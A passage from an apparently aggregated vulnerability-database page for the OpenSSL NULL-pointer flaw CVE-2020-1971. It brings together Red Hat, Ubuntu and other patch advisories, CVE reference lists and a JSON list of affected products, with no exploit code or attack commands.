reboot on the vSphere UPI 1920912 - Unable to power off BMH from console 1920981 - When OCS was deployed with arbiter mode enable add capacity is increasing the count by "2" 1920984 - [e2e][automation] some menu items names are out dated 1921013 - Gather PersistentVolume definition (if any) used in image registry config 1921023 - Do not enable Flexible Scaling to true for Internal mode clusters(revert to 4.6 behavior) 1921087 - 'start next quick start' link doesn't work and is unintuitive 1921088 - test-cmd is failing on volumes.sh pretty consistently 1921248 - Clarify the kubelet configuration cr description 1921253 - Text filter default placeholder text not internationalized 1921258 - User Preferences: Active perspective and project change in the current window when selected in a different window 1921275 - Panic in authentication-operator in (*deploymentController).updateOperatorDeploymentInfo 1921277 - Fix Warning and Info log statements to handle arguments 1921281 - oc get -o yaml --export returns "error: unknown flag: --export" 1921458 - [SDK] Gracefully handle therun bundle-upgradeif the lower version operator doesn't exist 1921556 - [OCS with Vault]: OCS pods didn't comeup after deploying with Vault details from UI 1921572 - For external source (i.e GitHub Source) form view as well shows yaml 1921580 - [e2e][automation]Test VM detail view actions dropdown does not pass 1921610 - Pipeline metrics font size inconsistency 1921644 - [e2e][automation] tests errors with wrong cloudInit new line syntax 1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation 1921655 - [OSP] Incorrect error handling during cloudinfo generation 1921713 - [e2e][automation] fix failing VM migration tests 1921762 - Serving and Eventing breadcrumbs should direct users back to tabbed page view 1921774 - delete application modal errors when a resource cannot be found 1921806 - Explore page APIResourceLinks aren't i18ned 1921823 - CheckBoxControls not internationalized 1921836 - AccessTableRows don't internationalize "User" or "Group" 1921857 - Test flake when hitting router in e2e tests due to one router not being up to date 1921880 - Dynamic plugins are not initialized on console load in production mode 1921911 - Installer PR #4589 is causing leak of IAM role policy bindings 1921921 - "Global Configuration" breadcrumb does not use sentence case 1921949 - Console bug - source code URL broken for gitlab self-hosted repositories 1921954 - Subscription-related constraints in ResolutionFailed events are misleading 1922015 - buttons in modal header are invisible on Safari 1922021 - Nodes terminal page 'Expand' 'Collapse' button not translated 1922050 - [e2e][automation] Improve vm clone tests 1922066 - Cannot create VM from custom template which has extra disk 1922098 - Namespace selection dialog is not closed after select a namespace 1922099 - Updated Readme documentation for QE code review and setup 1922146 - Egress Router CNI doesn't have logging support. 1922267 - Collect specific ADFS error 1922292 - Bump RHCOS boot images for 4.7 1922454 - CRI-O doesn't enable pprof by default 1922473 - reconcile LSO images for 4.8 1922573 - oc returns an error while using -o jsonpath when there is no resource found in the namespace 1922782 - Source registry missing docker:// in yaml 1922907 - Interop UI Tests - step implementation for updating feature files 1922911 - Page crash when click the "Stacked" checkbox after clicking the data series toggle buttons 1922991 - "verify /run filesystem contents do not have unexpected content using a simple Docker Strategy Build" test fails on OKD 1923003 - WebConsole Insights widget showing "Issues pending" when the cluster doesn't report anything 1923098 - [vsphere-problem-detector-operator] Need permission to access replicasets.apps resources 1923102 - [vsphere-problem-detector-operator] pod's version is not correct 1923245 - [Assisted-4.7] [Staging][Minimal-ISO] nodes fails to boot 1923674 - k8s 1.20 vendor dependencies 1923721 - PipelineRun running status icon is not rotating 1923753 - Increase initialDelaySeconds for ovs-daemons container in the ovs-node daemonset for upgrade scenarios 1923774 - Docker builds failing for openshift/cluster-resource-override-admission-operator 1923802 - ci/prow/e2e-aws-olm build failing for openshift/cluster-resource-override-admission-operator 1923874 - Unable to specify values with % in kubeletconfig 1923888 - Fixes error metadata gathering 1923892 - Update arch.md after refactor. 1923894 - "installed" operator status in operatorhub page does not reflect the real status of operator 1923895 - Changelog generation. 1923911 - [e2e][automation] Improve tests for vm details page and list filter 1923945 - PVC Name and Namespace resets when user changes os/flavor/workload 1923951 - EventSources showsundefined` in project 1923973 - Dynamic plugin demo README does not contain info how to enable the ConsolePlugins 1924046 - Localhost: Refreshing on a Project removes it from nav item urls 1924078 - Topology quick search View all results footer should be sticky. 1924081 - NTO should ship the latest Tuned daemon release 2.15 1924084 - backend tests incorrectly hard-code artifacts dir 1924128 - [sig-builds][Feature:Builds] verify /run filesystem contents do not have unexpected content using a simple Docker Strategy Build 1924135 - Under sufficient load, CRI-O may segfault 1924143 - Code Editor Decorator url is broken for Bitbucket repos 1924188 - Language selector dropdown doesn't always pre-select the language 1924365 - Add extra disk for VM which use boot source PXE 1924383 - Degraded network operator during upgrade to 4.7.z 1924387 - [ja_JP][zh_CN] Incorrect warning message for deleting namespace on Delete Pod dialog box. 1924480 - non cluster admin can not take VM snapshot: An error occurred, cannot set blockOwnerDeletion if an ownerReference refers to a resource you can't set finalizers on 1924583 - Deprectaed templates are listed in the Templates screen 1924870 - pick upstream pr#96901: plumb context with request deadline 1924955 - Images from Private external registry not working in deploy Image 1924961 - k8sutil.TrimDNS1123Label creates invalid values 1924985 - Build egress-router-cni for both RHEL 7 and 8 1925020 - Console demo plugin deployment image shoult not point to dockerhub 1925024 - Remove extra validations on kafka source form view net section 1925039 - [e2e] Fix Test - ID(CNV-5327) Change Custom Flavor while VM is running 1925072 - NTO needs to ship the current latest stalld v1.7.0 1925163 - Missing info about dev catalog in boot source template column 1925200 - Monitoring Alert icon is missing on the workload in Topology view 1925262 - apiserver getting 2 SIGTERM signals which was immediately making it exit code 1 1925319 - bash syntax error in configure-ovs.sh script 1925408 - Remove StatefulSet gatherer and replace it with gathering corresponding config map data 1925516 - Pipeline Metrics Tooltips are overlapping data 1925562 - Add new ArgoCD link from GitOps application environments page 1925596 - Gitops details page image and commit id text overflows past card boundary 1926556 - 'excessive etcd leader changes' test case failing in serial job because prometheus data is wiped by machine set test 1926588 - The tarball of operator-sdk is not ready for ocp4.7 1927456 - 4.7 still points to 4.6 catalog images 1927500 - API server exits non-zero on 2 SIGTERM signals 1929278 - Monitoring workloads using too high a priorityclass 1929645 - Remove openshift:kubevirt-machine-controllers decleration from machine-api 1929920 - Cluster monitoring documentation link is broken - 404 not found

References:

https://access.redhat.com/security/cve/CVE-2018-10103 https://access.redhat.com/security/cve/CVE-2018-10105 https://access.redhat.com/security/cve/CVE-2018-14461 https://access.redhat.com/security/cve/CVE-2018-14462 https://access.redhat.com/security/cve/CVE-2018-14463 https://access.redhat.com/security/cve/CVE-2018-14464 https://access.redhat.com/security/cve/CVE-2018-14465 https://access.redhat.com/security/cve/CVE-2018-14466 https://access.redhat.com/security/cve/CVE-2018-14467 https://access.redhat.com/security/cve/CVE-2018-14468 https://access.redhat.com/security/cve/CVE-2018-14469 https://access.redhat.com/security/cve/CVE-2018-14470 https://access.redhat.com/security/cve/CVE-2018-14553 https://access.redhat.com/security/cve/CVE-2018-14879 https://access.redhat.com/security/cve/CVE-2018-14880 https://access.redhat.com/security/cve/CVE-2018-14881 https://access.redhat.com/security/cve/CVE-2018-14882 https://access.redhat.com/security/cve/CVE-2018-16227 https://access.redhat.com/security/cve/CVE-2018-16228 https://access.redhat.com/security/cve/CVE-2018-16229 https://access.redhat.com/security/cve/CVE-2018-16230 https://access.redhat.com/security/cve/CVE-2018-16300 https://access.redhat.com/security/cve/CVE-2018-16451 https://access.redhat.com/security/cve/CVE-2018-16452 https://access.redhat.com/security/cve/CVE-2018-20843 https://access.redhat.com/security/cve/CVE-2019-3884 https://access.redhat.com/security/cve/CVE-2019-5018 https://access.redhat.com/security/cve/CVE-2019-6977 https://access.redhat.com/security/cve/CVE-2019-6978 https://access.redhat.com/security/cve/CVE-2019-8625 https://access.redhat.com/security/cve/CVE-2019-8710 https://access.redhat.com/security/cve/CVE-2019-8720 https://access.redhat.com/security/cve/CVE-2019-8743 https://access.redhat.com/security/cve/CVE-2019-8764 https://access.redhat.com/security/cve/CVE-2019-8766 https://access.redhat.com/security/cve/CVE-2019-8769 https://access.redhat.com/security/cve/CVE-2019-8771 https://access.redhat.com/security/cve/CVE-2019-8782 https://access.redhat.com/security/cve/CVE-2019-8783 https://access.redhat.com/security/cve/CVE-2019-8808 https://access.redhat.com/security/cve/CVE-2019-8811 https://access.redhat.com/security/cve/CVE-2019-8812 https://access.redhat.com/security/cve/CVE-2019-8813 https://access.redhat.com/security/cve/CVE-2019-8814 https://access.redhat.com/security/cve/CVE-2019-8815 https://access.redhat.com/security/cve/CVE-2019-8816 https://access.redhat.com/security/cve/CVE-2019-8819 https://access.redhat.com/security/cve/CVE-2019-8820 https://access.redhat.com/security/cve/CVE-2019-8823 https://access.redhat.com/security/cve/CVE-2019-8835 https://access.redhat.com/security/cve/CVE-2019-8844 https://access.redhat.com/security/cve/CVE-2019-8846 https://access.redhat.com/security/cve/CVE-2019-9455 https://access.redhat.com/security/cve/CVE-2019-9458 https://access.redhat.com/security/cve/CVE-2019-11068 https://access.redhat.com/security/cve/CVE-2019-12614 https://access.redhat.com/security/cve/CVE-2019-13050 https://access.redhat.com/security/cve/CVE-2019-13225 https://access.redhat.com/security/cve/CVE-2019-13627 https://access.redhat.com/security/cve/CVE-2019-14889 https://access.redhat.com/security/cve/CVE-2019-15165 https://access.redhat.com/security/cve/CVE-2019-15166 https://access.redhat.com/security/cve/CVE-2019-15903 https://access.redhat.com/security/cve/CVE-2019-15917 https://access.redhat.com/security/cve/CVE-2019-15925 https://access.redhat.com/security/cve/CVE-2019-16167 https://access.redhat.com/security/cve/CVE-2019-16168 https://access.redhat.com/security/cve/CVE-2019-16231 https://access.redhat.com/security/cve/CVE-2019-16233 https://access.redhat.com/security/cve/CVE-2019-16935 https://access.redhat.com/security/cve/CVE-2019-17450 https://access.redhat.com/security/cve/CVE-2019-17546 https://access.redhat.com/security/cve/CVE-2019-18197 https://access.redhat.com/security/cve/CVE-2019-18808 https://access.redhat.com/security/cve/CVE-2019-18809 https://access.redhat.com/security/cve/CVE-2019-19046 https://access.redhat.com/security/cve/CVE-2019-19056 https://access.redhat.com/security/cve/CVE-2019-19062 https://access.redhat.com/security/cve/CVE-2019-19063 https://access.redhat.com/security/cve/CVE-2019-19068 https://access.redhat.com/security/cve/CVE-2019-19072 https://access.redhat.com/security/cve/CVE-2019-19221 https://access.redhat.com/security/cve/CVE-2019-19319 https://access.redhat.com/security/cve/CVE-2019-19332 https://access.redhat.com/security/cve/CVE-2019-19447 https://access.redhat.com/security/cve/CVE-2019-19524 https://access.redhat.com/security/cve/CVE-2019-19533 https://access.redhat.com/security/cve/CVE-2019-19537 https://access.redhat.com/security/cve/CVE-2019-19543 https://access.redhat.com/security/cve/CVE-2019-19602 https://access.redhat.com/security/cve/CVE-2019-19767 https://access.redhat.com/security/cve/CVE-2019-19770 https://access.redhat.com/security/cve/CVE-2019-19906 https://access.redhat.com/security/cve/CVE-2019-19956 https://access.redhat.com/security/cve/CVE-2019-20054 https://access.redhat.com/security/cve/CVE-2019-20218 https://access.redhat.com/security/cve/CVE-2019-20386 https://access.redhat.com/security/cve/CVE-2019-20387 https://access.redhat.com/security/cve/CVE-2019-20388 https://access.redhat.com/security/cve/CVE-2019-20454 https://access.redhat.com/security/cve/CVE-2019-20636 https://access.redhat.com/security/cve/CVE-2019-20807 https://access.redhat.com/security/cve/CVE-2019-20812 https://access.redhat.com/security/cve/CVE-2019-20907 https://access.redhat.com/security/cve/CVE-2019-20916 https://access.redhat.com/security/cve/CVE-2020-0305 https://access.redhat.com/security/cve/CVE-2020-0444 https://access.redhat.com/security/cve/CVE-2020-1716 https://access.redhat.com/security/cve/CVE-2020-1730 https://access.redhat.com/security/cve/CVE-2020-1751 https://access.redhat.com/security/cve/CVE-2020-1752 https://access.redhat.com/security/cve/CVE-2020-1971 https://access.redhat.com/security/cve/CVE-2020-2574 https://access.redhat.com/security/cve/CVE-2020-2752 https://access.redhat.com/security/cve/CVE-2020-2922 https://access.redhat.com/security/cve/CVE-2020-3862 https://access.redhat.com/security/cve/CVE-2020-3864 https://access.redhat.com/security/cve/CVE-2020-3865 https://access.redhat.com/security/cve/CVE-2020-3867 https://access.redhat.com/security/cve/CVE-2020-3868 https://access.redhat.com/security/cve/CVE-2020-3885 https://access.redhat.com/security/cve/CVE-2020-3894 https://access.redhat.com/security/cve/CVE-2020-3895 https://access.redhat.com/security/cve/CVE-2020-3897 https://access.redhat.com/security/cve/CVE-2020-3898 https://access.redhat.com/security/cve/CVE-2020-3899 https://access.redhat.com/security/cve/CVE-2020-3900 https://access.redhat.com/security/cve/CVE-2020-3901 https://access.redhat.com/security/cve/CVE-2020-3902 https://access.redhat.com/security/cve/CVE-2020-6405 https://access.redhat.com/security/cve/CVE-2020-7595 https://access.redhat.com/security/cve/CVE-2020-7774 https://access.redhat.com/security/cve/CVE-2020-8177 https://access.redhat.com/security/cve/CVE-2020-8492 https://access.redhat.com/security/cve/CVE-2020-8563 https://access.redhat.com/security/cve/CVE-2020-8566 https://access.redhat.com/security/cve/CVE-2020-8619 https://access.redhat.com/security/cve/CVE-2020-8622 https://access.redhat.com/security/cve/CVE-2020-8623 https://access.redhat.com/security/cve/CVE-2020-8624 https://access.redhat.com/security/cve/CVE-2020-8647 https://access.redhat.com/security/cve/CVE-2020-8648 https://access.redhat.com/security/cve/CVE-2020-8649 https://access.redhat.com/security/cve/CVE-2020-9327 https://access.redhat.com/security/cve/CVE-2020-9802 https://access.redhat.com/security/cve/CVE-2020-9803 https://access.redhat.com/security/cve/CVE-2020-9805 https://access.redhat.com/security/cve/CVE-2020-9806 https://access.redhat.com/security/cve/CVE-2020-9807 https://access.redhat.com/security/cve/CVE-2020-9843 https://access.redhat.com/security/cve/CVE-2020-9850 https://access.redhat.com/security/cve/CVE-2020-9862 https://access.redhat.com/security/cve/CVE-2020-9893 https://access.redhat.com/security/cve/CVE-2020-9894 https://access.redhat.com/security/cve/CVE-2020-9895 https://access.redhat.com/security/cve/CVE-2020-9915 https://access.redhat.com/security/cve/CVE-2020-9925 https://access.redhat.com/security/cve/CVE-2020-10018 https://access.redhat.com/security/cve/CVE-2020-10029 https://access.redhat.com/security/cve/CVE-2020-10732 https://access.redhat.com/security/cve/CVE-2020-10749 https://access.redhat.com/security/cve/CVE-2020-10751 https://access.redhat.com/security/cve/CVE-2020-10763 https://access.redhat.com/security/cve/CVE-2020-10773 https://access.redhat.com/security/cve/CVE-2020-10774 https://access.redhat.com/security/cve/CVE-2020-10942 https://access.redhat.com/security/cve/CVE-2020-11565 https://access.redhat.com/security/cve/CVE-2020-11668 https://access.redhat.com/security/cve/CVE-2020-11793 https://access.redhat.com/security/cve/CVE-2020-12465 https://access.redhat.com/security/cve/CVE-2020-12655 https://access.redhat.com/security/cve/CVE-2020-12659 https://access.redhat.com/security/cve/CVE-2020-12770 https://access.redhat.com/security/cve/CVE-2020-12826 https://access.redhat.com/security/cve/CVE-2020-13249 https://access.redhat.com/security/cve/CVE-2020-13630 https://access.redhat.com/security/cve/CVE-2020-13631 https://access.redhat.com/security/cve/CVE-2020-13632 https://access.redhat.com/security/cve/CVE-2020-14019 https://access.redhat.com/security/cve/CVE-2020-14040 https://access.redhat.com/security/cve/CVE-2020-14381 https://access.redhat.com/security/cve/CVE-2020-14382 https://access.redhat.com/security/cve/CVE-2020-14391 https://access.redhat.com/security/cve/CVE-2020-14422 https://access.redhat.com/security/cve/CVE-2020-15157 https://access.redhat.com/security/cve/CVE-2020-15503 https://access.redhat.com/security/cve/CVE-2020-15862 https://access.redhat.com/security/cve/CVE-2020-15999 https://access.redhat.com/security/cve/CVE-2020-16166 https://access.redhat.com/security/cve/CVE-2020-24490 https://access.redhat.com/security/cve/CVE-2020-24659 https://access.redhat.com/security/cve/CVE-2020-25211 https://access.redhat.com/security/cve/CVE-2020-25641 https://access.redhat.com/security/cve/CVE-2020-25658 https://access.redhat.com/security/cve/CVE-2020-25661 https://access.redhat.com/security/cve/CVE-2020-25662 https://access.redhat.com/security/cve/CVE-2020-25681 https://access.redhat.com/security/cve/CVE-2020-25682 https://access.redhat.com/security/cve/CVE-2020-25683 https://access.redhat.com/security/cve/CVE-2020-25684 https://access.redhat.com/security/cve/CVE-2020-25685 https://access.redhat.com/security/cve/CVE-2020-25686 https://access.redhat.com/security/cve/CVE-2020-25687 https://access.redhat.com/security/cve/CVE-2020-25694 https://access.redhat.com/security/cve/CVE-2020-25696 https://access.redhat.com/security/cve/CVE-2020-26160 https://access.redhat.com/security/cve/CVE-2020-27813 https://access.redhat.com/security/cve/CVE-2020-27846 https://access.redhat.com/security/cve/CVE-2020-28362 https://access.redhat.com/security/cve/CVE-2020-29652 https://access.redhat.com/security/cve/CVE-2021-2007 https://access.redhat.com/security/cve/CVE-2021-3121 https://access.redhat.com/security/updates/classification/#moderate

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iQIVAwUBYDZ+bNzjgjWX9erEAQghXg//awGwjQxJ5LEZWBTdgyuCa8mHEi2rop5T lmebolBMNRSbo9gI8LMSHlvIBBFiV4CuFvfxE0AVLNentfzOTH11TxNWe1KQYt4H EmcGHPeHWTxKDkvAHtVcWXy9WN3y5d4lHSaq6AR1nHRPcj/k1upyx22kotpnYxN8 4d49PjFTO3YbmdYpNLVJ9nY8izqUpTfM7YSyj6ANZSlaYc5Z215o6TPo6e3wobf4 mWu+VfDS0v+/AbGhQhO2sQ7r2ysJ85MB7c62cxck4a51KiA0NKd4xr0TAA4KHnNL ISHFzi5QYXu+meE+9wYRo1ZjJ5fbPj41+1TJbR6O4CbP0xQiFpcUSipNju3rGSGy Ae5G/QGT8J7HzOjlKVvY3SFu/odENR6c+xUIr7IB/FBlu7DdPF2XxMZDQD4DKHEk 4aiDbuiEL3Yf78Ic1RqPPmrj9plIwprVFQz+k3JaQXKD+1dBxO6tk+nVu2/5xNbM uR03hrthYYIpdXLSWU4lzq8j3kQ9wZ4j/m2o6/K6eHNl9PyqAG5jfQv9bVf8E3oG krzc/JLvOfHNEQ/oJs/v/DFDmnAxshCCtGWlpLJ5J0pcD3EePsrPNs1QtQurVrMv RjfBCWKOij53+BinrMKHdsHxfur7GCFCIQCVaLIv6GUjX2NWI0voIVA8JkrFNNp6 McvuEaxco7U= =sw8i -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Solution:

For information on upgrading Ansible Tower, reference the Ansible Tower Upgrade and Migration Guide: https://docs.ansible.com/ansible-tower/latest/html/upgrade-migration-guide/ index.html

Bugs fixed (https://bugzilla.redhat.com/):

1790277 - CVE-2019-20372 nginx: HTTP request smuggling in configurations with URL redirect used as error_page 1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method 1850004 - CVE-2020-11023 jquery: Passing HTML containing elements to manipulation methods could result in untrusted code execution 1911314 - CVE-2020-35678 python-autobahn: allows redirect header injection 1928847 - CVE-2021-20253 ansible-tower: Privilege escalation via job isolation escape

Bug Fix(es):

Configuring the system with non-RT kernel will hang the system (BZ#1923220)
Bugs fixed (https://bugzilla.redhat.com/):

1902111 - CVE-2020-27813 golang-github-gorilla-websocket: integer overflow leads to denial of service

JIRA issues fixed (https://issues.jboss.org/):

CNF-802 - Infrastructure-provided enablement/disablement of interrupt processing for guaranteed pod CPUs CNF-854 - Performance tests in CNF Tests

Description:

Red Hat 3scale API Management delivers centralized API management features through a distributed, cloud-hosted layer. It includes built-in features to help in building a more successful API program, including access control, rate limits, payment gateway integration, and developer experience tools. Bugs fixed (https://bugzilla.redhat.com/):

1804533 - CVE-2020-9283 golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic 1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash

Description:

Before applying this update, make sure all previously released errata relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):

1887648 - CVE-2020-13943 tomcat: Apache Tomcat HTTP/2 Request mix-up 1903409 - CVE-2020-1971 openssl: EDIPARTYNAME NULL pointer de-reference 1904221 - CVE-2020-17527 tomcat: HTTP/2 request header mix-up 1917209 - CVE-2021-24122 tomcat: Information disclosure when using NTFS file system

========================================================================== Ubuntu Security Notice USN-4662-1 December 08, 2020

openssl, openssl1.0 vulnerability

A security issue affects these releases of Ubuntu and its derivatives:

Ubuntu 20.10
Ubuntu 20.04 LTS
Ubuntu 18.04 LTS
Ubuntu 16.04 LTS

Summary:

OpenSSL could be made to crash if it processed specially crafted input.

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 20.10: libssl1.1 1.1.1f-1ubuntu4.1

Ubuntu 20.04 LTS: libssl1.1 1.1.1f-1ubuntu2.1

Ubuntu 18.04 LTS: libssl1.0.0 1.0.2n-1ubuntu5.5 libssl1.1 1.1.1-1ubuntu2.1~18.04.7

Ubuntu 16.04 LTS: libssl1.0.0 1.0.2g-1ubuntu4.18

After a standard system update you need to reboot your computer to make all the necessary changes

Show details on source website

JSON

To clipboard

{
  "affected_products": {
    "_id": null,
    "data": [
      {
        "_id": null,
        "model": "business intelligence",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "5.9.0.0.0"
      },
      {
        "_id": null,
        "model": "communications subscriber-aware load balancer",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "cz8.3"
      },
      {
        "_id": null,
        "model": "essbase",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "21.2"
      },
      {
        "_id": null,
        "model": "graalvm",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "19.3.4"
      },
      {
        "_id": null,
        "model": "node.js",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "14.15.4"
      },
      {
        "_id": null,
        "model": "node.js",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "10.0.0"
      },
      {
        "_id": null,
        "model": "jd edwards world security",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "a9.4"
      },
      {
        "_id": null,
        "model": "communications session border controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "cz8.3"
      },
      {
        "_id": null,
        "model": "mysql server",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "5.7.32"
      },
      {
        "_id": null,
        "model": "enterprise session border controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "cz8.2"
      },
      {
        "_id": null,
        "model": "snapcenter",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "communications session router",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "cz8.4"
      },
      {
        "_id": null,
        "model": "manageability software development kit",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "node.js",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "12.12.0"
      },
      {
        "_id": null,
        "model": "communications subscriber-aware load balancer",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "cz8.4"
      },
      {
        "_id": null,
        "model": "openssl",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.1.1i"
      },
      {
        "_id": null,
        "model": "peoplesoft enterprise peopletools",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.58"
      },
      {
        "_id": null,
        "model": "jd edwards enterpriseone tools",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "9.2.5.3"
      },
      {
        "_id": null,
        "model": "oncommand workflow automation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "e-series santricity os controller",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.0.0"
      },
      {
        "_id": null,
        "model": "communications session border controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "cz8.4"
      },
      {
        "_id": null,
        "model": "mysql server",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.0.15"
      },
      {
        "_id": null,
        "model": "clustered data ontap antivirus connector",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "enterprise communications broker",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "pcz3.2"
      },
      {
        "_id": null,
        "model": "http server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "12.2.1.4.0"
      },
      {
        "_id": null,
        "model": "enterprise manager for storage management",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "13.4.0.0"
      },
      {
        "_id": null,
        "model": "business intelligence",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "12.2.1.3.0"
      },
      {
        "_id": null,
        "model": "node.js",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "12.0.0"
      },
      {
        "_id": null,
        "model": "hci storage node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "openssl",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.1.1"
      },
      {
        "_id": null,
        "model": "node.js",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "15.5.0"
      },
      {
        "_id": null,
        "model": "enterprise manager ops center",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "12.4.0.0"
      },
      {
        "_id": null,
        "model": "aff a250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "node.js",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "14.14.0"
      },
      {
        "_id": null,
        "model": "mysql server",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.0.22"
      },
      {
        "_id": null,
        "model": "plug-in for symantec netbackup",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "hci compute node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "_id": null,
        "model": "communications session router",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "cz8.3"
      },
      {
        "_id": null,
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "33"
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "10.0"
      },
      {
        "_id": null,
        "model": "enterprise session border controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "cz8.4"
      },
      {
        "_id": null,
        "model": "openssl",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.2x"
      },
      {
        "_id": null,
        "model": "sinec infrastructure network services",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "1.0.1.1"
      },
      {
        "_id": null,
        "model": "peoplesoft enterprise peopletools",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.56"
      },
      {
        "_id": null,
        "model": "peoplesoft enterprise peopletools",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.57"
      },
      {
        "_id": null,
        "model": "node.js",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "12.20.1"
      },
      {
        "_id": null,
        "model": "e-series santricity os controller",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.60.3"
      },
      {
        "_id": null,
        "model": "business intelligence",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "5.5.0.0.0"
      },
      {
        "_id": null,
        "model": "data ontap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "active iq unified manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "communications session router",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "cz8.2"
      },
      {
        "_id": null,
        "model": "oncommand insight",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "32"
      },
      {
        "_id": null,
        "model": "nessus network monitor",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "tenable",
        "version": "5.13.1"
      },
      {
        "_id": null,
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "node.js",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "10.13.0"
      },
      {
        "_id": null,
        "model": "log correlation engine",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "tenable",
        "version": "6.0.9"
      },
      {
        "_id": null,
        "model": "mysql",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.0.22"
      },
      {
        "_id": null,
        "model": "communications diameter intelligence hub",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.2.0"
      },
      {
        "_id": null,
        "model": "communications subscriber-aware load balancer",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "cz8.2"
      },
      {
        "_id": null,
        "model": "communications diameter intelligence hub",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "8.2.3"
      },
      {
        "_id": null,
        "model": "node.js",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "14.0.0"
      },
      {
        "_id": null,
        "model": "communications cloud native core network function cloud native environment",
        "scope": "eq",
